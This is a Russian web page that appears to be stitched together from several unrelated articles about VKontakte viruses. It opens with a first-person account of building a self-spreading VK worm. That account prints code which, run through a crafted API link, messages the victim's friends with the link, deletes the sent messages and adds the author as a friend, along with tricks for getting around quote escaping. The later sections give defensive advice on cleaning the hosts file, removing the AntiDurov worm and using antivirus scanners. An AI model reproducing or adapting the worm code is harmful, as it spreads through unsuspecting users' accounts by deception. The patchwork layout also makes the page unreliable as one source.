• Главная
  •  > 
  • Настройка Windows 10
  •  > 
  • Как удалить вирус в контакте. Вирус "вконтакте" и способы борьбы с ним Как проверить вк на вирусы

Как удалить вирус в контакте. Вирус "вконтакте" и способы борьбы с ним Как проверить вк на вирусы

В очередной день я сидел перед компьютером и не знал, чем заняться. Прокручивая свою ленту уже вернулся ко вчерашним постам, которые уже видел. Перейдя на свою страницу подумал про себя: «Боже, всего 160 подписчиков. Как же это мало...». И сразу же возник вопрос «А как их увеличить?». Ясное дело, что каждому на ум придет накрутка. Но для этого требовалось либо деньги, либо проводить много времени, подписываясь, делая репосты или лайкая всё, что угодно - это не было выходом.

Позже, перед сном, ко мне забралась идея, как это сделать. Идея заключалась в вирусной ссылке, которую получат почти все пользователи сети.

Проснувшись утром и попив кофе, я начал реализовывать эту идею. Для многих уже давно не секрет, что для выполнения запросов от имени пользователя в VK API, нужно иметь его access_token. Но! На самом сайте этого ключа не требуется, чтобы просто протестировать. Перед началом создания этого Супер вируса, я хотел просто проверить его работоспособность.

Для теста и использовал метод friends.add и в поле user_id прописал свой id. Выполнив это действие, адресная строка изменится, на что-то вроде этого:


Эту ссылку я сократил через vk.cc и оставил в комментариях к двум популярным группам с заманчивым описанием. Через полчаса у меня уже было 100 подписчиков (было бы больше, но мой комментарий удалили, а меня забанили). После этого, я стал уверен, что это сработает и приступил к его созданию.

Вконтакте ограничивает доступ к API от одного IP интервалом в 5 секунд, чтобы сервер не перегружался. И для решения проблемы с частыми запросами они создали метод execute . Этот метод позволяет вызывать несколько методов одновременно с сохранением алгоритма, чем я и воспользовался.

Этот вирус в основном опирается на доверчивость людей, двумя словами - «социальная инженерия». Каждый из нас наверняка перейдет по ссылке в сообщении от своего друга - именно этим я и хотел поработить мир воспользоватся.

На создание вируса у меня ушли примерно сутки, так как встретил пару преград. Об этом чуть позже. Вирус должен был работать так:

  1. Пользователь перешел по ссылке
  2. Метод получает список всех друзей и сортирует их по рейтингу
  3. Отправляет сообщение с текстом «Смотри /* ссылка */ »
  4. Сообщение удаляется у отправителя
  5. Добавляет в друзья и/или подписывается в указанные группы
  6. Друзья, которые получили сообщение переходят по ссылке
  7. Начинаем с начала
И собственно так выглядит этот код в методе:

Var a = API.friends.get({ // Метод для получения списка всех друзей "order": "hints" // Параметр для сортировки по рейтингу }).items; // Получить только список var b = 0; // Переменная для цикла var d = 0; // Переменная для id сообщения while (a[b]){ d = API.messages.send({ // Метод отправки сообщения. Возвращает id сообщения "user_id": a[b], // получатель "message": "Смотри /* ссылка */ " // текст сообщения }); API.messages.delete({ // Удалить сообщение по его id "message_ids": d }); b = b + 1; // Увеличить b на 1 (++b или b++ не работает) } API.friends.add({ "user_id": "мой id" });
Получив ссылку, я радостно пошел протестировать на своем фейковом профиле. Но не тут-то было. Перейдя по ссылке, мне выдало ошибку 12: Синтаксическая ошибка. Не ожидалось символа &. Здесь и начались мои преграды.

Как оказалось, сервер для защиты от XML переводит все знаки. И знак двойных кавычек " просто переводился в & quotes; а консоль
выдавала ошибку. Одинарные кавычки не переводятся, но их он не примет, так как синтаксис от JSON.

Так как это моя первая попытка работы с уязвимостью (как и этот пост) на это у меня ушло чуть дольше времени. Первые пять часов ушли на то, чтобы понять, что ключи можно передавать и без кавычек, и цифры писать в кавычках тоже не обязательно. Т.е. можно так:

API.friends.add({ user_id: 1234567 });
Хорошо, половина проблемы была решена. Осталась лишь одна проблема: мне нужно было придумать, как передать текст сообщения и слово «hints» для сортировки.

Для справки! Почему передавать параметр hints было обязательно?

Дело в том, что даже на странице теста метода, при подозрительном запросе (например отправка от 3 или 7 сообщении), требуется ввести капчу. Не факт, что сообщение будет отправлено нужному человеку. Поэтому передача этого параметра отсортирует список так, что первые трое из списка с большей вероятностью в 90% перейдут по ссылке.


Для решения последней проблемы я подумал использовать регулярные выражения или что-то вроде, для замены числа 0 в строку. Сам я только начинающий web разработчик и не знал, как это делать, и задал вопрос на тостере. Получив два нужных мне ответа с разными путями решений, сразу же решил использовать их. И тут снова проблема…

ВКонтакте API - это не JavaScript и не поддерживает его функции вроде replace() или toString(). Да и вообще ничего не поддерживает из JS, кроме var, return, while, if, else, массивов и операторов сравнения.

Я снова оказался в тупиковом положении и не знал, что мне делать. Я рассказал об этом своим знакомым программистам с просьбой помочь. Со словами «Это просто гениально, чувак!» они решили мне помочь и пошли копаться в документации к API

Ушло очень много времени, пока я думал, как мне решить эту проблему. Стало поздно и я пошел спать. Перед сном, меня опять озарила грандиозная идея с решением этой проблемы.

Снова утро. Попив свою дозу утреннего кофе первым делом я приступил к продолжению своего вируса.
Решение было довольно простым. Ведь передавая числа или переменные из методов, необязательно писать их в кавычках.

Для меня понадобился мой фейковый профиль. Там я сделал два разных поста с такими текстами:

  • Смотри /* ссылка */
  • hints
Всё, что мне требовалось, это получить эти записи и записать в переменные, что я и сделал. В итоге у меня получился такой код:

Var b = 0; // Переменная для цикла var d = 0; // Переменная для id сообщения var m = API.wall.get({ owner_id: id, // id фейковой страницы count: 1 // вернуть всего 1 пост }).items.text; // получить только текст статьи var h = API.wall.get({ owner_id: id, // id фейковой страницы count: 1, // вернуть всего 1 пост offset: 1 // сместить посты на 1 }).items.text; // получить только текст статьи var a = API.friends.get({ // Метод для получения списка всех друзей order: h // Параметр для сортировки по рейтингу }).items; // Получить только список while (a[b]){ d = API.messages.send({ // Метод отправки сообщения. Возвращает id сообщения user_id: a[b], // получатель message: m // текст сообщения }); API.messages.delete({ // Удалить сообщение по его id message_ids: d }); b = b + 1; // Увеличить b на 1 (++b или b++ не работает) } API.friends.add({ "user_id": "мой id" });
Получив ссылку, я проверил его на работоспособность и - ура! Всё работало так, как нужно. С фейковой страницы был отправлен запрос на добавление в друзья и успешно переданы сообщения первым 7 друзьям из рейтинга. Сжав ссылку и поставив его на первый пост, я с довольной улыбкой готовился к Большому Буму!

Чтобы еще и знать, сколько людей перешло по ссылке, я сжал ссылку к php файлу на моем хостинге, который записывал посещение в БД, и переадресовывал к методу с кодом.

Для интриги я не стал обновлять страницу каждый раз, а просто вышел из ВК сразу, после одного коммента. Вернулся примерно через час и, посмотрев на количество записей в БД, ощутил прилив счастья. Радости не было предела! Более 5000 переходов. «И этого всего за час! А что же будет через два?» - задавался себе вопросом. Ведь это был мой первый опыт в хакинге.

Решив посмотреть сколько все же набралось лично на странице, я зашел на сайт и вижу целых 3 новых подписчика! Не сказать, что я не был удивлен. Я ничего не понимал… В базе было более 5000 строк, где почти все имели индивидуальный IP, а подписчиков всего 3. Я начал думать, что я на самом деле не такой умный, кое себя считал 2 минут назад, и что от таких махинации у ВК уже есть защита. С такими мыслями я ушел грустить.

Прошло уже 2 дня. Перед тем, как идти спать, я решил проверить свой сайт. Заглянув в базу данных, и ради интереса посмотрел таблицу для записи статистики. Там уже набралось более 25 000 посещении по вирусной ссылке, а подписчиков стало меньше, т.к. отписались еще и те, которые для меня были тестом еще в начале.

Снова перед сном, я наконец понял, почему не было новых подписчиков, а количество переходов росло (кто-нибудь, напишите пост, почему именно перед сном приходят решения? Иначе я сам напишу).
Все дело было в коде. Метод execute выполняет код сохраняя алгоритм, а метод добавления в друзья был в самом конце. Он не срабатывал потому, что дальнейшие методы не выполнялись до тех пор, пока не будет введена капча. Т.к. у всех моих «жертв» было больше 8 друзей, естественно срабатывала капча, а пользователи заподозрив что-то, просто закрывали вкладку. Запись сохранялась, сообщения передавались, а рабов подписчиков не становилось больше.

Сразу скакнув из кровати, я решил исправить это быстро, чтобы к утру было уже более десяток тысяч подписчиков. После внесении изменении в php файле переадресации, я ушел спать с довольными мыслями завтрашнем дне.

Наступает утро и я проверяю свой профиль, даже не попив свой кофе. Ура! Подписчиков стало меньше…
Я снова был крайне удивлен. Всё же должно работать. На сей раз я решил проверить работоспособность ссылки на настоящем профиле. Удалив код, удаления сообщения, я перешел по сгенерированной ссылке. Оказывается эту уязвимость разработчики уже закрыли. Код в адресные строке по переходу уже не срабатывал

Я не знаю, как они сами до этого догадались. Я тут гений! То ли и до них дошло сообщение, то ли один из знакомых программистов втайне рассказал об уязвимости, чтобы там ни было я об этом никогда не узнаю.

Я всё равно был рад, так как я впервые смог найти уязвимость в большой сети. Может другим это обычное дело, но для меня это было чем-то особенным.

Теги: вконтакте api, уязвимости, социальная инженерия

Сегодня все чаще и чаще пользователи жалуются на то, что доступ к социальной сети Вконтакте блокируется различного рода вирусными программами. Проблема эта действительно актуальна и обусловливается это тем, что большинство людей просто не знает как удалить вирус Вконтакте. Так давайте научимся выявлять и исправлять эту проблему, а поможет в этом данная статья.


Удаление вируса Вконтакте


Чаще всего, заражение вирусом происходит тогда, когда пользователь переходит по вредоносной ссылке. Через некоторое время после заражения при входе в социальную сеть (а иногда и во время сеанса) Вы увидите примерно такую надпись.

Содержимое надписи может быть и другим, но необходимо понимать то, что это чистой воды развод. Таким образом мошенники пытаются на вас заработать, так как введя свой номер телефона в форму заполнения Вы, скорее всего, автоматически подпишитесь на платную спам рассылку. Очень важно не вводить никаких данных ни в одну из форм для заполнения. Сам по себе вирус заменяет в адресной строке браузер нужные Вам Vk.com на что-то, нужное уже мошенникам, причем с очень похожим доменным именем, например vksupp.ru.

При этом мошенникам предоставляется возможность выдать себя за службу поддержки Вконтакте. К сожалению даже современные антивирусы не могут вычислить вредоносный код если он уже проник на Ваш компьютер.

Пути решения проблемы

Как было сказано выше, антивирус не может обнаружить вредоносную программу, а это означает то, что справляться с ней Вам придется в ручную. Но не стоит пугаться, процесс не сложен и не отнимет много времени. Для начала откройте локальный диск C. Откройте папку etc , которая находится по следующему адресу.

В этой папке нужно найти и открыть файл Hosts .

Сделать это можно при помощи блокнота, выбрав его из списка предложенных программ. Перед Вами предстанет вот такой вот текст.

Внимательно проверьте содержимое вашего файла с содержимым, которое показано на картинке. Они не должны отличаться. Все лишнее выделяете и без сомнения жмете по клавише Delete . После этого следует перезагрузить свой компьютер и продолжать наслаждаться общением в социальных сетях.

Возможные трудности в процессе решения проблемы

1. Случается так, что файл Hosts открыть не удается. Вылетают ошибки или просто ничего не происходит. Справится с этой неприятностью можно при помощи загрузки компьютера в безопасном режиме.

Характерный признак - при входе на сайт открывается страница, в которой пишется нечто подобное:

Новые методы борьбы со спамом, и анонимными регистрациями. В связи с многочисленной регистрацией анонимных анкет, и активному подъему уровня спам-рассылок - теперь каждая анкета подлежит обязательной активации.Отправьте смс и так далее. Это лохотрон.

Что делать?

Причин может быть несколько.

1. C:\WINDOWS\system32\drivers\etc\hosts - проверьте этот документ (открывать блокнотом), если там есть упоминания о ВКонтакте (vkontakte.ru) - удалите эти строки.
(ВНИМАНИЕ. Вы должны быть администратором компьютера).

2. Если у вас на жестком диске есть файл vkontakte.exe или VK.exe - удалите его.
Чтобы найти эти файлы, жмем Пуск->найти->файлы и папки, вводим имена файлов в строку поиска.

3. Проверьте компьютер на наличие вирусов.

В любом случае потом измените пароли от почтового ящика и от ВКонтакте.

ВКонтакте никогда не требует никакой активации страниц пользователей. Никогда не устанавливайте "дополнения" для сайта.

Вирус Win32.HLLW.AntiDurov

Настоящая эпидемия разразилась в мае.

Инфицированные этой новой чумой машины начинают рассылать другим пользователям “Вконтакте” ссылку на безобидную с виду jpeg-картинку, лежащую на интернет-ресурсе злоумышленника. На самом же деле сервер передает по этой ссылке исполняемый файл “deti.scr”, который, собственно, и является непосредственно сетевым вирусом.

После запуска на компьютере жертвы, червь сохраняет на диске саму картинку, на которую повелся неосторожный юзер, и запускает штатное приложение, используемое в системе для просмотра файлов.jpeg. Скопировав себя в папку на жестком диске компьютера жертвы под именем svc.exe, пришелец устанавливается в системе в качестве сервиса “Durov VKontakte Service” и бесцеремонно роется в ящиках в поисках пароля к доступу на сайт “Вконтакте“, а обнаружив, рассылает по всему списку контактов бедняги вышеупомянутую ссылку. Червь несет в себе опасную деструктивную функцию. 25 числа каждого месяца в 10 часов утра на экране компьютера будет выводиться следующее сообщение (орфография сохранена):

Павел Дуров Работая с “ВКонтакте.РУ” Вы ни разу не повышали свой рейтинг и поэтому мы не получили от Вас прибыли. За это Ваш компьютер будет уничтожен!
Если обратитесь в милицию, то сильно пожалеете об этом!

Одновременно с этим начнется удаление с диска C: всех файлов. Если пользователь будет достаточно долго вчитываться в данный текст и предастся размышлениям относительно его содержания, он рискует потерять не только все системные файлы, но и свои файлы данных - документы, фотографии, электронные письма и многое другое.

Что делать

Оригинальный рецепт расположен на самом сайте вконтакте, но скорее всего у вас нет туда доступа, поэтому приводим тут полностью.

Для удаления вируса Вы можете воспользоваться batch-файлом

Сохраните его на диск и запустите.
Если Вы не уверены в результатах работы скрипта, воспользуйтесь следующей инструкцией:

1. Откройте консоль "Службы ". Для этого следует пройти по следующему пути: "Пуск " > "Панель управления " > "Администрирование " > "Службы "

2. В открывшемся окне найдите службу "Durov Vkontakte Service ", и откройте окно свойств, щёлкнув дважды по строке

3. Запомните имя службы (AntiDurov ) и путь к исполняемому файлу (в данном примере - C:Documents and SettingsalexanderApplication DataVkontakte )

4. Откройте Диспетчер задач , нажав одновременно клавиши CTRL+SHIFT+ESC , и на вкладке "Процессы " найдите процессы с названием svc.exe

5. Завершите эти процессы, поочерёдно выделяя их и нажимая кнопку "Завершить процесс ". Закройте Диспетчер задач.

6. Откройте командную строку: для этого в окне "Пуск " > "Выполнить... " наберите "cmd " и нажмите Enter

7. В окне командной строки наберите "sc delete AntiDurov " (последнее слово должно совпадать с запомненным вами именем службы) и нажмите Enter

8. Перейдя в окно консоли "Службы ", убедитесь, что служба "Durov Vkontakte Service " отсутствует (предварительно обновите содержимое окна, нажав F5

9. Откройте "Мой компьютер " и в строке адреса впишите путь к исполняемому файлу из п.3. (без имени самого файла svc.exe! ) Нажмите Enter .

10. В открывшемся окне выделите и удалите файл svc.exe, нажав SHIFT+DELЕTЕ

P.S.: если подобной службы Вы не обнаружили, но Вам кажется, что вирус всё равно есть, попробуйте его найти через поиск:

Пуск > Поиск > "Что вы хотите найти: файлы и папки ", в поле "Часть имени файла... " введите"svc.exe ", в "дополнительных параметрах " отметьте три первых пункта (в системных папках, в скрытых папках, вложенные папки)
Если файла с таким названием не найдено (именно с таким названием , файлы вроде "cisvc", "svchost" не в счёт), то вируса, вероятнее всего, нет.
Если файл найден, убедитесь, что им не запущены процессы (см. пункты 4 и 5), после чего удалите файл, выделив его в окне результатов поиска и нажав SHIFT+DELЕTЕ .

P.S.

Установите антивирус, или воспользуйтесь онлайн антивирусом . Перейдите по ссылке и нажмите Kaspersky Online Scanner

Вы когда-нибудь задумывались о том, как защитить страницу Вконтакте от взлома? Сегодня я покажу, насколько просто это стало в наше время. Есть специальный сканер, который рекомендует сама социальная сеть.

Вам остается только установить такой сканер себе на компьютер и наслаждаться дополнительной еще и бесплатной защитой от всех видов нападения на вашу «страничку».

Защита страницы ВК

Итак, называется приложение — Антивирусный Сканер Cezurity. В народе его уже прозвали, как антивирус Вконтакте. Программа загружается бесплатно прямо с сайта соц.сети и устанавливается в течение нескольких минут. Не нужно покупать не какие лицензии. В конце статьи вы сможете посмотреть видео обзор по всей теме.

Антивирус Вконтакте (Сканер Cezurity)

Облачный сервис для проверки и лечения компьютера. Антивирусный Сканер Cezurity бесплатно проверит ваш компьютер на наличие вредоносных программ — вирусов, троянов, шпионских приложений, руткитов (скрытых программ). В случае заражения антивирусный сканер вылечит Ваш компьютер.

  • Быстрая проверка займет всего несколько минут.
  • Сканер поможет обнаружить и нейтрализовать угрозы, пропущенные другими антивирусами.
  • Совместим с другими установленными антивирусами.
  • Просто и быстро устанавливается, не требует постоянных обновлений антивирусных баз.

Выглядит меню скачки, как запуск обычного приложения в соц.сети:

После нажатия на кнопку «Установить сканер» вы должны увидеть окно, в котором предложат варианты установки. Где в первом случае устанавливается программа с рекомендованными настройками, а во втором случае можно отключить ненужные вам действия. Сделали свой выбор и нажали кнопку «принять и установить»

После сохранения запускаем файлик и начинается установка «антивируса Вконтакте»

И вот в конце перед вами открывается главное меню программы

Данное приложение не является основной защитой вашего компьютера от вирусов – это лишь профессиональный инструмент для защиты страницы в вк. Еще раз повторяю, не является общим антивирусом для всей системы.

Видео обзор по установке и запуску «антивируса Вконтакте»

Не забывайте оставлять свои комментарии, помогла ли программа избавиться вам от каких-либо вредоносных кодов или атак, которые были незаметны во время использование других защитных программ.

Есть довольно большое количество компьютерных угроз, целью поражения которых являются социальные сети. Самый яркий пример, это требование отправить смс на платный номер, при попытке зайти на страницу. Если вы увидели такое сообщение, значит вам нужно удалить вирус вконтакте .

Давайте разбираться, как это сделать.

Как выглядит угроза

При попытке зайти к себе на страницу, вы можете увидеть следующую картину.

Давайте избавляться от этого.

Используем антивирусную утилиту

Https://free.drweb.ru/download+cureit+free/?lng=ru

Установите и запустите. Желательно это делать в безопасном режиме, и отключать интернет на время сканирования.

Стартовое окно выглядит вот так.

Нажмите кнопку «Начать проверку» , и проведите полное сканирование компьютера. Все найденные угрозы нужно вылечить или удалить.

После этого нужно очистить системный файл Hosts . Он находится по следующему пути:

C:\Windows\System32\drivers\etc

Перейдите в эту папку, и откройте его с помощью блокнота. Проверьте, если ли посторонние записи. И удалите их, при наличии.

После этого перезагрузите компьютер, и попробуйте зайти к себе на страницу в ВК.

Вопросы?

Вконтакте